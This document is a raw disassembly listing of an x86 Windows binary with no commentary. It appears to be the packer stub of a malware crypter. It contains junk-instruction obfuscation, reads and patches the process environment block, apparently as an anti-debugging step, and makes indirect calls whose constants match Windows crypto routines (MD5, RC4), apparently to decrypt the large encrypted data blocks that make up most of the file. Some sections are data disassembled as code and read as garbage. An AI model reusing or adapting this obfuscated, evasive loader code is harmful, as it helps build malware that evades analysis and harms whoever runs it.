dd 0CD932C05h, 5FBEF781h, 0F7BE3FFAh, 0BA15F29Dh, 11540428h
dd 73CC45C7h, 81726574h, 2B8F01C7h, 0EB358D79h, 0C1DFE4AEh
dd 3D8D15DBh, 6DF007A9h, 0BF66DEF7h, 45C7163Eh, 726553D0h
dd 0C1D7F776h, 0D98709D3h, 74DF158Dh, 0BB905510h, 1029A70h
dd 158DFA33h, 9FC3245Ch, 8D0ED7C1h, 0E78DDE0Dh, 5EBB90EDh
dd 8BE55C76h, 8BF633F3h, 0F7FE33CFh, 0D445C7DBh, 50656369h
dd 0F709DEC1h, 81D6F7D3h, 6B3CD8FFh, 0D845C779h, 65636F72h
dd 0AD89BE66h, 0FA33F789h, 6618DFC1h, 73DC45C7h, 913D8D73h
dd 81691251h, 558ECAF1h, 8DD6F751h, 37C48C35h, 33DFF7F5h
dd 3A1D8DCEh, 338D49A4h, 0DE45C6D1h, 0E3D78100h, 877537F3h
dd 9730B9DEh, 0C5BF1F9Eh, 335D4C22h, 8DDA89F5h, 0B708321Dh
dd 90DAF7D5h, 6A7C7BBBh, 36BE66D1h, 90C933EEh, 8106EFC1h
dd 3412B7DEh, 10D1C1F9h, 0D833D9F7h, 810AD9C1h, 9169C6C3h
dd 0A015FFCFh, 8B100030h, 4E3D8DFAh, 8DD5AF57h, 0BE6F650Dh
dd 0FC00BCDh, 9884h, 20BF6600h, 11C9C184h, 0D6F7D9F7h
dd 60F18190h, 66FF84DFh, 0C1573ABAh, 0BF660DC1h, 0F28919F7h
dd 0BB18C9C1h, 0CFA3643Bh, 6C158D90h, 8BEDCE03h, 250D8DDFh
dd 8CAFEEB4h, 9AE181C8h, 89E54E90h, 0F9E1B9CBh, 0F633D5F0h
dd 7A8B5EB9h, 0AF389E1h, 42850FE4h, 0C1000000h, 0D98110DEh
dd 6DD3A9F9h, 7E8AAFBBh, 63F98149h, 0C1BFAE6Ch, 0C3C102CFh
db 1Ah
; ---------------------------------------------------------------------------
loc_403789: ; CODE XREF: .text:004039AE�j
push 0
shl edi, 1Ch
lea edi, ds:6D7AF1E0h
neg edx
mov si, 3554h
call dword ptr ds:100030A4h
rcr esi, 0Eh
mov esi, 6DB48855h
mov ebx, esi
mov cx, 56E6h
shr ebx, 1Dh
cmp eax, 5
mov si, 2CA0h
xor ebx, ebx
mov di, 540Eh
push 293h
sub ecx, 0CD9F94A2h
lea edx, ds:95ABD17Ah
sub ebx, 0CDE6F76Fh
add ecx, 0AD7BABDCh
not ebx
mov edx, 55CFA1D2h
pop dword ptr [ebp-14h]
xor ecx, ecx
lea esi, ds:55C58EF6h
lea esi, ds:913D4168h
xchg edx, ecx
mov cx, 5350h
mov si, 0A82Ch
nop
or edi, 1554E8FAh
rcr edi, 17h
mov ecx, 1F9988F5h
mov cx, 7AEDh
xor edi, edi
xor edi, ebp
mov cx, 8C67h
mov ecx, 0C9008A13h
mov dword ptr [ebp-10h], 0A552254Ah
mov edi, 0BD2DC480h
not esi
mov ecx, edx
mov dx, 1172h
lea edx, ds:55AE6B6Ah
and edi, 6D3CAD14h
push edx
mov edx, esi
mov di, 133Ch
lea edi, ds:15C7031Ch
cmp edi, 0B5549B73h
not edx
neg edx
lea ecx, ds:0EDA8A53Eh
mov ecx, ebx
push eax
adc esi, 1D74DDF1h
mov di, 0F254h
neg edx
mov ebx, 0CDA6BBD7h
xor edi, ecx
cmp edi, 9F955E97h
call dword ptr ds:10003100h
xor ebx, ecx
lea ebx, ds:55DA076Ah
xor ecx, ebx
lea ecx, ds:95F86488h
cmp ebx, 3FE8FEB9h
xor ecx, ebx
xor edi, ecx
not esi
xor eax, 804B1DA8h
xchg edi, ecx
mov edx, 576261Fh
rcr edx, 15h
shr ebx, 0Ah
not esi
mov [ebp-0Ch], eax
mov edi, ebx
neg esi
lea edx, ds:690ACA99h
nop
mov cx, 59C3h
mov esi, edx
shr edi, 1
nop
shl ebx, 1Bh
rcl edi, 13h
lea ebx, ds:0C56DAAC3h
ror edi, 18h
mov si, 7923h
mov eax, large fs:18h
xor edi, esp
mov esi, ecx
neg ebx
shl ecx, 1Eh
not edi
mov dx, 32D7h
mov edx, 15ED3AC4h
mov eax, [eax+30h]
xor esi, ecx
mov ecx, ebx
lea ebx, ds:0B500284Eh
mov ecx, edx
mov bx, 82BDh
lea ecx, ds:0EDA7D88Ch
lea esi, ds:5FC6642Eh
mov esi, edx
push dword ptr [eax+2]
add edi, 1FEFE212h
xor edi, 0F9662396h
mov di, 0ED63h
neg edx
not edi
mov esi, 15A367B1h
neg edi
mov esi, 0EDCF9D24h
push eax
not edx
mov si, 0F130h
shl esi, 18h
xor esi, edi
nop
xor ebx, ebx
xor ebx, edx
rcl esi, 3
neg edi
xchg edx, edi
nop
add esi, 0DF993DE6h
rol edx, 1Ch
lea ecx, ds:39376292h
lea ecx, ds:952802ABh
mov edx, 0BFB6E947h
adc ebx, 0D14E6B8Bh
rol esi, 2
mov dword ptr [eax+2], 95959595h
lea esi, ds:0CDDA479Ch
neg ecx
xchg esi, ebx
adc ecx, 21474D16h
xchg esi, ecx
xor ebx, edi
call dword ptr ds:10003084h
xor ecx, 3FA762E7h
lea edi, ds:55D92C9h
mov edx, ebx
mov ecx, 1962F3DCh
mov ecx, edi
mov edx, 15B66587h
or eax, eax
jz loc_403789
mov ecx, edx
xor edx, edi
not esi
mov ah, al
shl ebx, 0Ch
add ebx, 55824181h
lea edi, ds:0FC34B74h
nop
rcr ecx, 14h
shr ebx, 10h
sub edi, 3FFFD288h
mov edx, 0BD65944Eh
xchg esi, edi
nop
xor edx, edi
lea edx, ds:192358EFh
mov ebx, edi
shl edx, 1Fh
lea esi, ds:6FC1E242h
mov esi, 0ED3523D9h
ror eax, 8
xchg edx, ebx
mov si, 0E859h
lea edx, ds:1F84611Dh
mov bx, 603Ch
rcl edx, 10h
mov ah, al
lea ecx, ds:1FA15A62h
xor ebx, esi
xor edx, esi
adc esi, 0BD6D7A70h
sub ecx, 916B4A7Eh
ror eax, 8
xor ecx, 0D5E19D00h
neg edi
mov ebx, ecx
lea ebx, ds:0FD3E97AFh
mov ah, al
mov si, 7C2Ch
mov di, 438Ch
xchg edx, esi
rol esi, 4
lea edx, ds:16FFB2Ah
lea edx, ds:6DF5EE1Dh
rcl edx, 0Eh
mov [ebp-8], eax
mov ecx, 0CD861034h
mov di, 2DE4h
lea esi, ds:0C53CAFBBh
nop
xchg esi, edx
neg ebx
mov cx, 8C1Ah
xor ebx, ecx
xor edx, edx
nop
rcl edx, 7
mov si, 0ED0Eh
mov si, 62AEh
lea edx, ds:0CDECBD9Dh
mov esi, edi
pop eax
shl esi, 9
neg esi
xor edx, 0AFDE8888h
xor edx, ecx
xor ecx, 39084460h
not esi
shl ebx, 12h
mov di, 0B830h
pop dword ptr [eax+2]
mov edi, ecx
mov edi, 0EFF69E7Ah
lea edx, ds:0F527FA9Fh
xor edi, ebx
mov ebx, 0D5A7D73Bh
xor edi, ebx
lea eax, [ebp-4]
lea ebx, ds:6DAE9939h
lea edx, ds:0CD9E2FF7h
xchg esi, ebx
rol ecx, 1Dh
mov ecx, edx
mov ebx, 993C9711h
not ebx
push eax
mov ecx, 0F1760C76h
mov bx, 0C947h
mov di, 0E450h
ror ecx, 14h
mov edx, esi
mov edx, 7FBC0073h
and edx, 517A2CBEh
xor esi, edx
push 40h
rcr edi, 9
mov cx, 0B072h
xchg ebx, ecx
mov si, 0E416h
shl ecx, 8
mov bx, 854Fh
sbb esi, 15FC520Eh
push 11C8h
lea ecx, ds:0FFF58E35h
lea ebx, ds:0FCC6C78h
xor edi, ebx
rcr ebx, 11h
push 10001BA9h
shr esi, 14h
cmp ebx, 15ED9F14h
mov esi, 754CBF72h
xor ebx, edi
mov si, 0F7A5h
xor esi, 4FEAAFE3h
lea edx, ds:15FCFE97h
and edi, 0E1517BDDh
call dword ptr ds:10003064h
mov bx, 0A9E3h
or edx, 9518239Dh
mov ebx, 954F57B1h
mov bx, 0FC7Ah
mov ebx, 8FA244B4h
sub edx, 0D57026ABh
nop
sbb ebx, 1F85664Ch
neg edi
mov cx, 537Ah
lea edi, ds:0DD76088Dh
mov esi, 6DFCE3B1h
xor ebx, edx
mov dx, 2443h
nop
or ebx, 3F8AB37Eh
ror ebx, 1Ah
mov edi, 0AFBB0C2Ah
mov ebx, 456497AFh
mov edi, esi
lea eax, [ebp-3Ch]
mov ebx, 2F8C1DDEh
mov dx, 3DA6h
xor ebx, edi
xor edx, edi
sbb edx, 513C6ECBh
mov di, 87C2h
mov ebx, esi
push 0F0000000h
mov dx, 63Ah
and ecx, 753376C8h
neg edx
lea edx, ds:3FAD0D82h
adc ecx, 6DC851C9h
mov dx, 9917h
lea esi, ds:0CD9DD5EFh
push 1
xchg edx, ecx
shl ecx, 9
shr edi, 10h
push 0
shr edx, 0
lea ebx, ds:0D5CC23E0h
rol edi, 10h
mov ebx, 4D7B581Eh
shr edi, 0Ah
rcr edx, 14h
mov di, 332Bh
ror edx, 1Dh
push 0
neg edx
xor edx, edx
xor ebx, edi
xor esi, ebp
xchg edi, ebx
mov ebx, esi
not ecx
push eax
mov ebx, esi
rcr ecx, 17h
xor ebx, esp
call dword ptr ds:10003134h
not esi
mov cx, 909h
rol ebx, 3
nop
neg ebx
mov edx, 9FF110FBh
mov edx, esi
xor edx, esp
mov di, 0ECEEh
nop
rol edx, 0Fh
mov ebx, edi
xchg esi, edx
mov edi, ebx
xor ecx, esi
sub ebx, 2119CA03h
xor ebx, ebp
mov ecx, 0E5614A6Fh
lea eax, [ebp-40h]
shr esi, 15h
lea edi, ds:7F87BD6Fh
mov di, 0E001h
mov si, 0A6Fh
and ecx, 9962EFF9h
neg ecx
shl ebx, 4
push eax
mov ebx, 1597C47Dh
not ebx
rol esi, 0Dh
mov esi, 0F9545332h
shr edi, 0Fh
lea ebx, ds:0E17893C3h
push 0
shl edi, 0Dh
lea ecx, ds:0CFBFAE10h
neg edx
xor ecx, edx
push 0
lea edx, ds:0BF8017A2h
xor ebx, eax
mov esi, 6FAD6766h
mov dx, 0ED8Ah
not edi
push 8003h
mov bx, 0C608h
lea edx, ds:49607222h
xor edx, edx
push dword ptr [ebp-3Ch]
rol edi, 1Ah
lea esi, ds:91104AA1h
lea ebx, ds:158779C2h
mov ecx, 0B17E3422h
lea ebx, ds:15FDEC2Eh
call dword ptr ds:10003124h
lea edx, ds:0EFD67E73h
shl edx, 19h
xor ecx, 995B3077h
not ecx
nop
rcl ebx, 5
mov di, 2EB9h
neg ebx
sbb ecx, 1F808B54h
neg ebx
nop
add edi, 9953F4D9h
shr ecx, 1Dh
not ecx
lea eax, [ebp-14h]
lea ebx, ds:0A95C564Ah
add ebx, 0D5D9B17Bh
and edi, 9551A828h
mov edi, 15DBBAAEh
lea edx, ds:55FBB2ACh
push 0
add edi, 0DFB0BEBEh
xor ecx, esi
xor edi, ebp
mov ecx, edi
mov si, 0A6C2h
mov cx, 0EAFAh
push 14h
rol ecx, 1Bh
add esi, 490EDDAAh
neg esi
mov ecx, edx
mov bx, 106Eh
push eax
mov edx, 0CD87AAD9h
lea esi, ds:1D54457Eh
mov si, 7387h
neg ecx
not esi
push dword ptr [ebp-40h]
mov si, 0FBCDh
lea esi, ds:3D7131DFh
rcr edi, 15h
call dword ptr ds:1000313Ch
mov edi, edx
lea ebx, ds:0E111D418h
xor ebx, eax
mov esi, ecx
xor edi, ebp
or ecx, 116E2CFAh
neg edx
xor edi, 0BD022185h
nop
mov ebx, 3D1782FCh
xor esi, ecx
mov edx, esi
nop
xor ebx, ebx
rcr edi, 4
mov edi, 0F12AC81Eh
lea edi, ds:0FF98BBCCh
lea eax, [ebp-44h]
rcr edi, 18h
rol ebx, 1
mov ebx, edi
not ecx
mov bx, 9BF4h
mov ecx, esi
push eax
lea edx, ds:1FB30AFCh
lea esi, ds:496EA130h
mov esi, 0CDFC194Bh
lea edi, ds:0EDCA37AEh
rcl edx, 1Eh
lea edi, ds:0C55F2819h
mov si, 1C65h
mov esi, ecx
push 800000h
mov si, 0A683h
adc edi, 0E1325841h
mov edi, 1D66B8BEh
rcr edi, 8
xchg esi, ecx
xor edx, edi
mov dx, 3A8Ch
xor ecx, edx
push dword ptr [ebp-40h]
lea ecx, ds:0FD26B009h
sbb edi, 0A131BAEFh
mov esi, 796AFBA3h
lea edi, ds:6122B374h
push 6801h
mov esi, edx
mov ecx, 2FDC7CA5h
not ecx
lea esi, ds:5516A15Fh
xor edx, esi
lea ecx, ds:15ACA325h
push dword ptr [ebp-3Ch]
not esi
xor ebx, ebx
lea edi, ds:89194BF0h
lea ecx, ds:215520A2h
call dword ptr ds:10003138h
neg ebx
xor esi, edi
shl ecx, 19h
mov si, 4AEBh
nop
lea ecx, ds:0DFBC820Fh
mov dx, 0DA55h
mov ecx, 55BE0641h
xor esi, eax
and edx, 0C97B99D6h
nop
mov ebx, edi
xor ecx, esi
mov si, 677Eh
push 11C8h
rol edx, 8
mov edi, esi
mov di, 11C8h
mov edx, ecx
push esp
xor edx, edi
lea esi, ds:8926F406h
neg esi
xor ecx, ebx
push 10001BA9h
neg esi
neg edx
lea ebx, ds:0E121DA04h
rcl ecx, 4
adc edi, 0F12C3396h
sbb edx, 895B42F8h
mov esi, ecx
neg ecx
push 0
mov bx, 909h
neg ecx
xor esi, 5D7EF129h
shr edi, 6
mov ecx, 1FD8F26Fh
shl edx, 0Fh
lea ecx, ds:492D2AB8h
shl esi, 1
push 1
lea ecx, ds:0A9334693h
rol esi, 1Fh
sub ebx, 0D5C21F54h
xor esi, 0E521B989h
mov ecx, 0CDF7065Dh
mov edi, 0D17BB42Dh
xor edx, edx
push 0
neg ebx
xor ecx, 6FAE4637h
rcl esi, 4
xor ebx, ebx
xchg ebx, ecx
neg ecx
push dword ptr [ebp-44h]
xor ecx, edi
neg esi
lea ebx, ds:4D0D9F9Eh
xor ecx, esi
call dword ptr ds:10003164h
add esp, 4
mov esi, ecx
cmp ecx, 114B2059h
rcr edx, 4
shl esi, 8
not esi
lea ebx, ds:0E9441552h
sbb esi, 391F4B02h
nop
rol edi, 0Dh
lea ecx, ds:9F8BAF1Fh
adc esi, 7F8AB104h
not ebx
mov edx, edi
shl edx, 18h
neg edi
nop
mov dx, 2586h
mov si, 464h
mov bx, 8AB5h
shl esi, 6
loc_403FA2: ; CODE XREF: .text:00403FB7�j
neg ecx
neg ebx
popa
leave
loc_403FA8: ; CODE XREF: .text:00403FB5�j
jmp $+5
; ---------------------------------------------------------------------------
db 0CDh, 41h, 0E5h
; ---------------------------------------------------------------------------
jnp short loc_404024
and al, [eax+5Ah]
jb short loc_403FA8
jge short loc_403FA2
and esi, eax
ror byte ptr [ebp-423A3763h], 1
mov al, 42h
retn
; ---------------------------------------------------------------------------
dd 0EA37A21Ah, 0C67441D1h, 0A9E45968h, 67712550h, 1671ACBh
dd 62BD92BAh, 84E4695Ch, 0B3F4FAAFh, 0C50DC974h, 0A4459988h
; ---------------------------------------------------------------------------
leave
loc_403FED: ; CODE XREF: .text:00404069�j
push ecx
mov eax, ds:7C695DBCh
retn 8E19h
; ---------------------------------------------------------------------------
aDsPe_NZimvC db 'DPe.<mV',0
db 0F6h
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 5Bh, 12h, 80h
dd 7AA58D3Eh, 0F3CA24EDh, 59943705h, 4AD9D83Dh, 4148D4B4h
dd 0E79E054Ch
; ---------------------------------------------------------------------------
loc_404024: ; CODE XREF: .text:00403FB0�j
push ecx
into
cmp ebx, [ebx]
or edi, [edi-2Ch]
pushf
and ch, [ecx]
and [edx], esi
db 67h, 26h
rep mov ch, 5
inc ebp
mov bl, 2Bh
inc esp
xchg dl, ah
lodsb
xchg eax, ecx
out dx, al
add al, 0BAh
lock or eax, esp
in al, dx
pop ebx
cmp [ebx-68EB4020h], ch
imul ebx, [ebx-1Dh], 5184042Dh
out dx, eax
neg dword ptr [eax+57994C8Bh] ; CODE XREF: .text:00404061�j
xchg dl, [eax] ; CODE XREF: .text:00404063�j
in eax, 6Ch
mov ah, 7Fh
push es
dec ebp
jle short near ptr loc_404053+2
jns short near ptr loc_404059+1
sub ebx, [edx]
jp short loc_40406E
jg short loc_403FED
pop esp
cdq
xchg eax, edx
loc_40406E: ; CODE XREF: .text:00404067�j
imul eax, [edx-7ABBB196h], 0EF7385E1h
xor al, [ecx+ebx*2-7D41F51h]
mov ebx, ss
pop es
; ---------------------------------------------------------------------------
dw 66DBh
dd 8E586FEEh, 870BD3CFh, 0EA69ED7Dh, 0F1295DDh, 0B207E647h
dd 0C7C7E901h, 14B59044h, 5237EAFDh, 0AFFCD089h, 0FE7D50DAh
dd 0EECE7BDFh, 0CB6143EAh, 22CA3401h, 8203C3ACh, 0BA497FAAh
dd 3AE3FA62h, 5BE7131Dh, 232A22Ch, 9089B8D8h, 7C584CA5h
dd 42763DF4h, 0F10EE7B8h, 0D053FE77h, 0F9195520h, 76053275h
dd 4FC3874Fh, 276EBF06h, 474D9048h, 0C8B11143h, 0F0F31A36h
dd 86364389h, 56267B3Bh, 41CCA9CCh, 0AD33F3F1h, 0B9F68ED6h
dd 0FDA98918h, 858429AEh, 518B3487h, 0B01D479Ah, 77AC8577h
dd 0CB327586h, 9B3DD28Bh, 929F1B31h, 0E3BADB33h, 80158188h
dd 0E9054884h, 7B0A08CDh, 919B014Eh, 384C8924h, 649EE52h
dd 5DF591AFh, 19B1DED3h, 0B52412DFh, 0A3FE75AFh, 0FB536FD8h
dd 74B7761h, 2A08122Bh, 0BD2D30B9h, 0A62A4ADFh, 4E35D967h
dd 0FE4D5F51h, 5CEEF6D2h, 2CAA4DEFh, 9FFEDD16h, 8D64D0A1h
dd 48268FBCh, 2318CECFh, 0D877B0CAh, 0D3F8036Fh, 0B7763DEh
dd 1F5343E3h, 9E320DDBh, 4E22DE7Ah, 13936F16h, 0D2A9373Bh
dd 9CE39EB8h, 39663B2h, 18CAB2C3h, 45E1CD17h, 37CE5537h
dd 0CC0DDF21h, 5B5B3CC7h, 0D5EF3FD6h, 5BF4DC89h, 0A6E13AADh
dd 0DC45BE0Bh, 0A16F92E4h, 0FC28F9BBh, 0BD2C287Bh, 0DA1CDDA4h
dd 95C90A5Dh, 0EA3F7E1Eh, 9E86DBCEh, 92F44268h, 9DF934FDh
dd 44644421h, 8FC33DBFh, 67F40062h, 0A631DCC2h, 0FF389C9Dh
dd 890E526Ch, 59CA5D3Eh, 83B85CB0h, 15E8A1BEh, 5498402Eh
dd 0ED9EE1B3h, 5F22255Bh, 0B1A6F181h, 0B0631E83h, 0D408C82h
dd 82D8955Bh, 0A4793884h, 3096B9A8h, 428C0ED6h, 0F54FE1A3h
dd 71C244FAh, 0A0662FB8h, 6DEFE52Ch, 0CB003666h, 0A940FFD6h
dd 0B1AAD0E9h, 0F1B39562h, 829910DAh, 0A6A6C092h, 7F8634B9h
dd 0E1CAD104h, 9F384E40h, 353A516Dh, 33AD1936h, 0CBB52BFFh
dd 96020F9h, 0A43137E6h, 77E856DCh, 7663CBD5h, 810ED5A8h
dd 0F89BE0C4h, 48804262h, 0E4C1E83Dh, 6FB3D4B4h, 0CE590CBh
dd 0E0726EACh, 519A0CCBh, 37D0C1DEh, 9132DD26h, 165B73DCh
dd 0ED32BCAh, 0B4C3C245h, 0B132B862h, 7FE849A2h, 0BBD15069h
dd 0D096B642h, 3AF7C40Fh, 42BD1D5Ch, 3A521D60h, 0B93A57EFh
dd 9D11D3Bh, 8C974890h, 44228EE8h, 39A15730h, 14265874h
dd 0E9CF4C55h, 952B1A13h, 9AB2A06Dh, 22BEBB56h, 28195D89h
dd 315D970Ah, 0A6D56FADh, 0EE684E0h, 0F7E3A092h, 0A50E7881h
dd 0C8886AE0h, 0F2A24578h, 0A1FC455Fh, 0F4C3F92h, 9C7E805h
dd 0E8731915h, 734CF052h, 48E4BD07h, 0ED757EEBh, 1501F836h
dd 0D5C55B3Eh, 553700A3h, 0BF74F193h, 6EAAF0CBh, 0B856BF9Eh
dd 80E327Eh, 5696F37Bh, 0A29BD2B5h, 88A8E247h, 8B9BFC67h
dd 4A2BD9BAh, 2C97C5F9h, 3726DB41h, 5A44BBE3h, 0A344BA64h
dd 0A7CD4987h, 0A1CC3FCEh, 5F9335BAh, 0E60779A4h, 0C461BADFh
dd 6B5AF894h, 0F12DE0B8h, 4DA937F4h, 8FE6EB03h, 0BA75A89Fh
dd 9CACD686h, 172DF8E6h, 0E72BA8C0h, 6A2474C1h, 0E111E1FAh
dd 0DA2F273Eh, 0A213F3Fh, 0CDCAFC19h, 4993EAAFh, 472847FCh
dd 0CC03AEFFh, 1E5E4D91h, 81D6D1F5h, 0DBE20FF3h, 2C62D750h
dd 0B293A2Bh, 68E44630h, 7C1C4DDBh, 7B4B87FFh, 0C7FD143Bh
dd 0D6FAFFEh, 0CBD6223Dh, 22AB206Ah, 783A88D6h, 0C9DC8635h
dd 21F7AA82h, 0EAFC02CFh, 0CCCA8BC2h, 0E9D3EB51h, 0ABC27558h
dd 0B2B78DB8h, 7A1D7A60h, 5450966Dh, 17922F4Bh, 0D1701FC7h
dd 8A031F29h, 0FE047301h, 17A238C9h, 0EB75FC1Ah, 7A0A77D9h
dd 0C62EEB52h, 0A27618A2h, 204E083Dh, 0BDE5EA0Dh, 0EB9D0A35h
dd 0BB2F4759h, 0F707FC33h, 199997BDh, 0AE69FF8Ch, 414E7996h
dd 0C7EA7F03h, 9454DB2Dh, 4DB014Bh, 56A06704h, 4F33416Dh
dd 4084A809h, 0F3A847A9h, 0DB7D586Ch, 7E9D2AD0h, 377F5692h
dd 398DC960h, 4A68B401h, 0D4B9011h, 0B7476F0h, 0A9290F63h
dd 9B9B9E53h, 38AFC607h, 0D54DEB3h, 63B12FE2h, 37D693Fh
dd 0D1917A8Fh, 4B84304Eh, 1E050EF6h, 306AE673h, 0C292B470h
dd 0C4DC4540h, 0CA0D3E11h, 0A4D3F7E3h, 42571EEFh, 85438468h
dd 7F2B449Ch, 0BB02F21Eh, 0A949B354h, 0ED765997h, 0AF7E260Eh
dd 1AC04F3h, 0D7C99725h, 0D39436D6h, 9516F400h, 54A12647h
dd 0EE52AEEh, 81CAC07Ch, 81BF01EBh, 0A7D41779h, 300D8864h
dd 0EE725FEFh, 9309612Bh, 0F72030C2h, 8A56FB0Ch, 36785960h
dd 5DAF6AA9h, 3D111B82h, 60A99D38h, 4DCB4168h, 73569A3Fh
dd 596A5413h, 5F8DCDF1h, 0CCBE5A54h, 126F3F92h, 0F1F1DB35h
dd 0E9573AA4h, 3633F6BAh, 5E14966Bh, 654B543Ah, 0D9965D17h
dd 8682D851h, 63A4B458h, 0EFFCB6D1h, 768DB07Fh, 1DFCFB77h
dd 0A2CE654h, 6DB1C91Eh, 2B602F80h, 7EC442C6h, 9FE9CC10h
dd 0A294D1DCh, 3A88D96Eh, 67184F0Ah, 358309BBh, 1A90FC29h
dd 6004E92Ah, 0E8779E65h, 0B1D5918Fh, 0EDE5BDF0h, 64ECB066h
dd 0C3E22DF6h, 254FECA3h, 0CC8F9CC5h, 656E5F89h, 32E0F76Ch
dd 4B554A78h, 31C7F3A3h, 5E227EE7h, 5A565DDh, 0FE47BB62h
dd 125C231Fh, 2DE2E1B3h, 51170977h, 22FF325Dh, 0C8ACD6B9h
dd 0B5E94440h, 60BACEEh, 0DCF396D9h, 0EA7257C9h, 68384EBEh
dd 7DF384C1h, 4466F0EDh, 0F6BDC0A2h, 86ABB8D0h, 222D2115h
dd 0CEFC79E8h, 293AF0F3h, 0D1A9FBE3h, 9255453Fh, 9B0D03D7h
dd 46BF0A7Bh, 9DF4EC51h, 45FF2C72h, 32E4AA8Fh, 3A3CC5B1h
dd 7DE62ABFh, 0E9D668C1h, 4DC4B762h, 9D7EA10h, 0DF999A81h
dd 0F1383637h, 0CC057B32h, 264C181Ch, 0BD20CF40h, 2D8B33FBh
dd 61E8D02Ch, 0AD7EE7B9h, 0F3528488h, 51CFF488h, 0B0BBC1CDh
dd 0A1203CF0h, 80B98C7Bh, 48F9E134h, 18D8BD5Ch, 0B2DC6643h
dd 1F115C0Ah, 2F764088h, 57AB2E64h, 4C2CC90Fh, 91451FC8h
dd 0CEBD1702h, 38782AC7h, 5D0BEFCDh, 62F6002Ah, 0CAA93B66h
dd 0B9CBAF79h, 0E00D5AE5h, 3BD8730Ah, 68FDA558h, 3B840F11h
dd 0DE01E1ADh, 0E53C8511h, 272C234Ah, 0F98D97ADh, 59CBF9B7h
dd 0C1AA1E24h, 890F87A0h, 911F2B2Fh, 7A64187Fh, 0B8340490h
dd 90951FB1h, 0D90D9258h, 8A2DA41Bh, 0E2EA03A3h, 8D88257Ch
dd 3899D1E5h, 33FB35F0h, 33FA00EEh, 0A4B42B8h, 0F13CF66h
dd 0ECC90D6Fh, 9C3903F6h, 5DE37BF5h, 8E63E8Ch, 0FC773AEAh
dd 4E7DB9AAh, 0F9E26887h, 7543EDC8h, 0FF2918E6h, 0EA33CA5Eh
dd 376F436Ch, 0F93D7DA9h, 0CD09D585h, 0AECFD204h, 9FD564C2h
dd 2B2D4891h, 6345A271h, 0D7AB3B66h, 9BDC66C8h, 7C3C2741h
dd 1B8B0ACh, 2BCE7935h, 6733001Bh, 65EBCB01h, 0D159E07Eh
dd 93BD0E7Eh, 8969511Eh, 66FC3C03h, 0B260EC41h, 11BB1203h
dd 0DCC4ED3Bh, 0E9222279h, 59C9FDC8h, 0FE471724h, 48C68C39h
dd 0D769A7F1h, 0A55B56C2h, 0B5F6D23Ah, 0E120E7D3h, 4EE6F09Ah
dd 939DEA58h, 0D89BDC71h, 233ADADBh, 0C71A33F0h, 18A1E1D4h
dd 96EDC5F3h, 0DD1EBA5Bh, 0DAB1F391h, 0D016D85Fh, 0FC754F80h
dd 23E65771h, 5BCA00F5h, 28148936h, 61FF328Dh, 0D6F4D0C8h
dd 827C39CBh, 3313B42Ch, 885BEB46h, 89B795C1h, 1A02E7CBh
dd 286E6B8Eh, 386B2A4Eh, 7D807079h, 543C5001h, 0C3A555ECh
dd 323BA5F3h, 0BDF09DB1h, 0B97278F2h, 281C641Ch, 0E30EA770h
dd 97B9B741h, 0A3DDD034h, 0CA216C1h, 2A7BF6F2h, 2A53A785h
dd 75CCF609h, 0EFEDCCA0h, 0FB53BBC5h, 0CC339325h, 33B71226h
dd 0AEB1D5CEh, 8F41FFA3h
dd 23238ECCh, 34135000h, 41F1C6B3h, 3A11FE14h, 0A9008E27h
dd 66D40B40h, 7E8B4A40h, 70F2233Ch, 6B214EE6h, 19FDB715h
dd 0B1D72FD3h, 8D7E5211h, 0A676C763h, 4B3D9243h, 0C73C6A9Eh
dd 0EFF9344h, 3058DFFCh, 1A5660FAh, 314E336Bh, 0CA53E565h
dd 5F8B0166h, 60F1D00Bh, 0F8AA8F8Ah, 64D74914h, 0DDD7E721h
dd 34E55296h, 0F4CCA91Bh, 0BB1E939Bh, 4AA76A8Ch, 0BAF99C8Bh
dd 0FD99A1B6h, 327F529Dh, 0BA1655CDh, 8C7AC85Ah, 2C9A487Bh
dd 0FEF1B0Dh, 0BB5B64Dh, 0AABB1A8Eh, 0BC7CCA94h, 43EEEE98h
dd 1B943360h, 0D6151F51h, 2997706Ah, 0C02CDF2Eh, 0B79D1CDFh
dd 3F37FB7Dh, 33E623FEh, 0FDE96AACh, 11DF61D7h, 15644E25h
dd 56061C9Bh, 99A3A7Eh, 9ECF3921h, 0EC5000C1h, 7346480Fh
dd 0C45C9165h, 13596285h, 279878BCh, 0C05B650Bh, 8CA0A86Ah
dd 505ACF16h, 0B811F122h, 3721CFAh, 2AD042CDh, 9053699h
dd 3C04D59Bh, 115A2EA8h, 1D02022Fh, 41E35782h, 8CD48EC5h
dd 0A0A7F630h, 227B1941h, 3489E677h, 5015FD2Ah, 0B468A7AFh
dd 0A1A1C2A2h, 109F1295h, 5EC43329h, 0E7C02530h, 0E72E20C3h
dd 0FC8BDDF7h, 0D445C1E7h, 0F4B039EAh, 75E0E041h, 0F2025914h
dd 5DA2221Fh, 4C48BF5Ah, 95998793h, 0C6958A17h, 0B3B2F352h
dd 0F79C3A50h, 9BA07E6Ch, 98953C81h, 0F29DD918h, 2606472Ch
dd 0BC03CECCh, 0FAC311C3h, 0E8431B86h, 40BC0654h, 0AB77A5F8h
dd 0D20858B4h, 272F7F16h, 0E3FCBC77h, 0F48C965Ch, 8E13A3E2h
dd 0DC009276h, 4F827616h, 0E9F329C5h, 9A169F8Dh, 4C6D4D6Fh
dd 52ED4041h, 4005DB6Ah, 1025363Eh, 0F80D9E83h, 0DF35963Ah
dd 524B203Bh, 65DD2038h, 0BAF9B3D0h, 0F9722F0Ah, 671AA069h
dd 0BABF658Bh, 8187593Fh, 0A60B8615h, 35D84D09h, 7466D8C0h
dd 6DF70A08h, 91277780h, 0C9B64A91h, 0E267F324h, 604FA3E3h
dd 67B4C9C9h, 0BA73C2DDh, 75EF4B08h, 0D41A3494h, 1A1AC077h
dd 834A201Dh, 5225982h, 3BA92A06h, 6515DC3Ah, 0E0F45FC3h
dd 73A0CCB3h, 22DD2632h, 0AE121334h, 367072C6h, 0E1FC7D3h
dd 0EB33F5C9h, 0FC2D82D8h, 0AE972E55h, 963B40ECh, 0A417818Fh
dd 0FA5CEC61h, 0F268A338h, 4E0879E4h, 5C28ACCDh, 15233FFh
dd 82A5C62Ah, 3917853Eh, 0E54BEC5Ah, 8FB5AD5Eh, 89B7DAE8h
dd 2FB6E7A6h, 267F7D9h, 842C7754h, 9584E05Bh, 5AF82A13h
dd 9BF8329Eh, 11CEEC56h, 38B83850h, 0DDCB7B60h, 695182A3h
dd 0CF1776B1h, 3E139D28h, 35C97DADh, 0C53C940Bh, 0BE77EF10h
